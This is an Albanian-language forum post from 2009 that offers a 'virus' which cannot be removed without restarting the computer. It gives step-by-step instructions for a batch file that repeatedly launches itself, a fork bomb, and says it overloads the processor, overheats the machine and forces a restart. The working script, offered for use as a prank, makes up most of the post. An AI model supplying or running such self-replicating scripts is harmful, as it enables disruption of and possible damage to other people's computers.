qe nje virus te, qe smundesh me hek pa e ristartu kompjuterin

  Share
  avatar
  loti the hacker
  WebMaster
  WebMaster

  Postimet : 522
  Pikët : 1499
  Thanks : 7
  Location : TeToVa
  Join date : 07/05/2009

  (N) qe nje virus te, qe smundesh me hek pa e ristartu kompjuterin

  Mesazh nga loti the hacker prej Mon Jun 01, 2009 6:08 am

  hape notpad

  shkruje

  start 1.bat
  start 1.bat
  start 1.bat
  start 1.bat
  start 1.bat
  start 1.bat

  edhe ruaje ne Emrin 1.bat

  dhe provo pasi te aktivizohet virusi ather, sun e hek dhe duhesh me ristartu pc-n me lon dhez me ket virus e mundon procesorin dhe vjen deri te nxehja e kompjuterit, dhe ather gjeget.

   Ora është Fri Jun 22, 2018 1:45 am